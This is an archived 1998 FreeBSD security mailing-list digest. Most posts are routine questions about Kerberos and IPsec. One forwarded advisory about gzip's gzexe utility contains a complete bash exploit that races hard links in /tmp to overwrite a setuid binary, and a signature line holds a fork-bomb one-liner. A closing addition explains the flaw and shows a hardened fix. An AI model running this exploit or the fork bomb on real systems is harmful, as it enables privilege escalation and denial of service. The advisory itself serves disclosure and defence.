From owner-freebsd-security Tue Feb 3 04:19:35 1998
Return-Path:
Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA14573 for security-outgoing; Tue, 3 Feb 1998 04:19:35 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from mgmt-server1.icscorp.com (mgmt-server1.icscorp.com [206.181.224.111]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id EAA14568 for ; Tue, 3 Feb 1998 04:19:34 -0800 (PST) (envelope-from tepkes@mgmt-server1.icscorp.com)
Received: from tepkes.icscorp.com (unverified [206.181.224.80]) by mgmt-server1.icscorp.com (EMWAC SMTPRS 0.83) with SMTP id ; Tue, 03 Feb 1998 07:18:07 -0500
Message-Id: <3.0.5.32.19980203072102.007a9af0@mail.icscorp.com>
X-Sender: tepkes@mail.icscorp.com
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Tue, 03 Feb 1998 07:21:02 -0500
To: freebsd-security@freebsd.org
From: Tim Epkes
Subject: mailing list
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I would like to get put onto this mailing list, please.
Thanks

From owner-freebsd-security Tue Feb 3 22:04:28 1998
Return-Path:
Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA22222 for security-outgoing; Tue, 3 Feb 1998 22:04:28 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA22148; Tue, 3 Feb 1998 22:03:59 -0800 (PST) (envelope-from cy@cschuber.net.gov.bc.ca)
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id WAA11791; Tue, 3 Feb 1998 22:03:47 -0800 (PST)
Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaasbCa; Tue Feb 3 22:03:35 1998
Received: (from uucp@localhost) by cwsys.cwsent.com (8.8.8/8.6.10) id WAA26921; Tue, 3 Feb 1998 22:03:32 -0800 (PST)
Message-Id: <199802040603.WAA26921@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpd026914; Wed Feb 4 06:03:23 1998
X-Mailer: exmh version 2.0.1 12/23/97
Reply-to: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-Sender: cy
To: freebsd-security@freebsd.org
cc: security-officer@freebsd.org
Subject: GZEXE - the big problem
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 03 Feb 1998 22:03:18 -0800
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Would this be a problem under FreeBSD? A subsequent posting by Theo de Raadt intimated that he had fixed the OpenBSD version.
Regards,                         Phone:  (250)387-8437
Cy Schubert                      Fax:    (250)387-5766
UNIX Support                     OV/VM:  BCSC02(CSCHUBER)
ITSD                             BITNET: CSCHUBER@BCSC02.BITNET
Government of BC                 Internet: cschuber@uumail.gov.bc.ca
                                           Cy.Schubert@gems8.gov.bc.ca

------- Forwarded Message

** DESCRIPTION **

GZEXE, part of the gzip package, is a small utility which allows 'transparent' compression of any kind of executable (just like pklite under ms-dos). Unfortunately, it may be extremely dangerous. Here's the shell script used for decompression:

  if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then...
                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  [...]
  /tmp/gztmp$$ ${1+"$@"}; res=$?
  ^^^^^^^^^^^^

Just look at this... An example of a badly-written one ;) It's possible to overwrite any file (including SUIDs!) with the code of a gzexed executable when root executes it... Then, this unwanted suid may be easily exploited. It's also possible to enforce execution of OUR OWN code instead of the gzexed program, just by choosing as a victim any file not owned by the user running vulnerable executables, but writable by him/her. This file (even setuid) may be freely modified by the attacker... Whoops!

** EXPLOIT **

-- GZEXE EXPLOIT --

  #!/bin/bash

  # GZEXE executables exploit (gzip 1.2.4)
  # by Michal Zalewski (lcamtuf@staszic.waw.pl)
  # ---------------------------------------------

  VICTIM=/bin/ping
  GZEXED=a.out

  # Note: to locate gzexed executables you may use this:
  # find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut -f 1 -d " "

  if [ ! -f $VICTIM ]; then
    echo "I can't find my victim ($VICTIM)..."
    exit 0
  fi

  ORIG=`ls -l $VICTIM|awk '{print \$5}'`

  echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)."

  renice +20 $PPID >&/dev/null

  cd /tmp

  touch $GZEXED

  while :; do

    START=`ps|awk '$6=="ps"{print $1}'`

    let START=START+100
    let DO=START+100

    while [ "$START" -lt "$DO" ]; do
      ln $VICTIM gztmp$START &>/dev/null
      let START=START+1
    done

    sleep 10

    rm -f gztmp* &>/dev/null

    NOWY=`ls -l $VICTIM|awk '{print \$5}'`

    if [ ! "$ORIG" = "$NOWY" ]; then
      echo "Done, my master."
      exit 0
    fi

  done

-- EOF --

It may be left in background, just like my gcc-exploit-2. Please verify the vulnerable executable filename (GZEXED - you may specify more than one file, separated by spaces).

** FIX **

DO NOT USE GZEXE TO COMPRESS EXECUTABLES. That's all, TMPDIR will NOT help in this case.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=-------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] ---------=

------=_NextPart_000_004D_01BD2C35.8C227840
Content-Type: application/octet-stream; name="gzexeploit"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="gzexeploit"

------=_NextPart_000_004D_01BD2C35.8C227840--

------- End of Forwarded Message

From owner-freebsd-security Wed Feb 4 08:57:37 1998
Return-Path:
Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA15926 for security-outgoing; Wed, 4 Feb 1998 08:57:37 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from ve7tcp.ampr.org (ve7tcp.ampr.org [198.161.92.132]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA15917 for ; Wed, 4 Feb 1998 08:57:29 -0800 (PST) (envelope-from lyndon@ve7tcp.ampr.org)
Received: from localhost.ampr.org (localhost.ampr.org [127.0.0.1]) by ve7tcp.ampr.org (8.8.8/8.8.4) with SMTP id JAA28568 for ; Wed, 4 Feb 1998 09:57:22 -0700 (MST)
Message-Id: <199802041657.JAA28568@ve7tcp.ampr.org>
X-Authentication-Warning: ve7tcp.ampr.org: localhost.ampr.org [127.0.0.1] didn't use HELO protocol
To: freebsd-security@freebsd.org
Subject: /usr/include/kerberosIV
X-Attribution: VE7TCP
X-URL: http://ve7tcp.ampr.org/
Organization: The Frobozz Magic Homing Pigeon Company
Date: Wed, 04 Feb 1998 09:57:22 -0700
From: Lyndon Nerenberg
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

More and more I get annoyed at the /usr/include/kerberosIV directory. Of all the Kerberos implementations I've dealt with it seems that these days the 4.4BSD derived systems are the only ones isolating the Kerberos 4 include files in this subdirectory.
As a developer this is a minor but annoying pain in the *** in that it's necessary to special case software configuration scripts to deal with the non-orthogonal prefixes to the Kerberos include and lib directories on FreeBSD (and BSD/OS) systems.

I'd like to propose that for 3.0 we follow the rest of the world and move the Kerberos 4 includes directly into /usr/include. We could leave a symlink behind to maintain source compatibility with existing code that #includes .

--lyndon

From owner-freebsd-security Thu Feb 5 15:29:19 1998
Return-Path:
Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA22515 for security-outgoing; Thu, 5 Feb 1998 15:29:19 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from serv.gtcs.com (serv.gtcs.com [206.54.69.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA22509 for ; Thu, 5 Feb 1998 15:29:18 -0800 (PST) (envelope-from root@gtcs.com)
Received: from localhost (root@localhost) by serv.gtcs.com (8.8.5/8.6.12-2xx) with SMTP id QAA21250 for ; Thu, 5 Feb 1998 16:29:16 -0700 (MST)
Date: Thu, 5 Feb 1998 16:29:16 -0700 (MST)
From: Charlie ROOT
To: freebsd-security@freebsd.org
Subject: NIST ipsec distribution
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Just wondering if anyone else is working with the Linux distribution of ipsec (cerberus-0.1) from NIST.
Bruce Gingery
Advanced Integrators, LC

From owner-freebsd-security Fri Feb 6 18:43:53 1998
Return-Path:
Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA20795 for security-outgoing; Fri, 6 Feb 1998 18:43:53 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA20783; Fri, 6 Feb 1998 18:43:51 -0800 (PST) (envelope-from cy@cschuber.net.gov.bc.ca)
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id SAA13800; Fri, 6 Feb 1998 18:43:48 -0800 (PST)
Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaakyaa; Fri Feb 6 18:43:40 1998
Received: (from uucp@localhost) by cwsys.cwsent.com (8.8.8/8.6.10) id SAA16522; Fri, 6 Feb 1998 18:43:37 -0800 (PST)
Message-Id: <199802070243.SAA16522@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpd016513; Sat Feb 7 02:43:00 1998
Reply-to: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-Mailer: MH
X-Sender: cy
To: freebsd-security@freebsd.org
cc: jmb@freebsd.org
Subject: Test
Date: Fri, 06 Feb 1998 18:42:59 -0800
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Since hub.freebsd.org came back online I haven't been receiving any freebsd-security messages. They show up on ftp.freebsd.org but not in my mailbox. This is a test.
Regards,                         Phone:  (250)387-8437
Cy Schubert                      Fax:    (250)387-5766
UNIX Support                     OV/VM:  BCSC02(CSCHUBER)
ITSD                             BITNET: CSCHUBER@BCSC02.BITNET
Government of BC                 Internet: cschuber@uumail.gov.bc.ca
                                           Cy.Schubert@gems8.gov.bc.ca

From owner-freebsd-security Sat Feb 7 16:07:45 1998
Return-Path:
Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA27332 for security-outgoing; Sat, 7 Feb 1998 16:07:45 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from pegasus.rutgers.edu (pegasus.rutgers.edu [128.6.10.45]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id QAA27327 for ; Sat, 7 Feb 1998 16:07:38 -0800 (PST) (envelope-from paradox@pegasus.rutgers.edu)
Received: from wasteland (wasteland.rutgers.edu [128.6.32.75]) by pegasus.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) with SMTP id TAA13641 for ; Sat, 7 Feb 1998 19:07:37 -0500
Message-Id: <3.0.5.32.19980207190928.009435d0@pegasus.rutgers.edu>
X-Sender: paradox@pegasus.rutgers.edu
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Sat, 07 Feb 1998 19:09:28 -0500
To: freebsd-security@freebsd.org
From: Red Barchetta
Subject: Kerberos authentication?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hi all-

I was discussing this with a few colleagues the other day, and I thought I'd run it by this list to try to get some feedback...

I am interested in setting up a FreeBSD box as a Kerberos server for a small department (about 15 computers) composed of Suns, SGIs, and IBMs. I haven't yet done all of my homework, but my main questions are these: Is this feasible? Is there software available that will allow the 3 different OSes involved here (Solaris, IRIX, AIX) to authenticate logins to a 4th (FreeBSD), or would this require a large amount of custom programming on my part?

The other thing I'd like to ask for is links/references that might be useful in such a venture.
If this is too non-FreeBSD specific for continued discussion on the list, feel free to email me privately.

Thanks!

Ernie Pistor
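Returning to the gzexe advisory forwarded earlier on this page: the stub's plain `>` into the predictable /tmp/gztmp$$ opens with O_TRUNC, so a hard link that someone has already placed at that name turns the write into a rewrite of the link target. The example below is added here and is not code from any of the posts; it stands the victim binary and the predictable name in with constructed files in a scratch directory it owns, and shows the O_EXCL-based fix (noclobber plus mktemp(1)) beside the original pattern.

```shell
#!/bin/sh
# Added example (not from the original posts).  "victim" stands in for a
# root-owned binary and "gztmp123" for the predictable /tmp/gztmp$$ name;
# both are constructed files in a scratch directory created with mktemp -d.

# Build the scene: a victim file plus a pre-placed hard link at the
# predictable name.  Prints the scratch directory path.
setup_scene() {
    dir=$(mktemp -d) || return 1
    printf 'original victim contents\n' > "$dir/victim"
    ln "$dir/victim" "$dir/gztmp123"      # link at the predictable name
    printf '%s\n' "$dir"
}

# What the gzexe 1.2.4 stub did: redirect into the predictable name.
# Plain ">" is open(O_CREAT|O_TRUNC), so the write follows the link.
# Returns 0 when the victim has been clobbered.
unsafe_extract() {
    ( set +C; printf 'payload\n' > "$1/gztmp123" ) 2>/dev/null
    [ "$(cat "$1/victim")" = "payload" ]
}

# Hardened stub: with noclobber (set -C) ">" uses O_EXCL and refuses an
# existing path; mktemp(1) then creates a fresh name, also with O_EXCL.
# Returns 0 when the victim survived untouched.
safe_extract() {
    if ( set -C; printf 'payload\n' > "$1/gztmp123" ) 2>/dev/null; then
        return 1                           # noclobber should have refused
    fi
    tmp=$(mktemp "$1/gztmp.XXXXXX") || return 1
    printf 'payload\n' > "$tmp"
    [ "$(cat "$tmp")" = "payload" ] || return 1
    rm -f "$tmp"
    [ "$(cat "$1/victim")" = "original victim contents" ]
}

# Remove a scene created by setup_scene.
cleanup_scene() {
    rm -rf "$1"
}
```

The same O_EXCL discipline is why the advisory's note that TMPDIR does not help is right: moving the predictable name elsewhere changes where the link has to be placed, not whether the truncating open follows it.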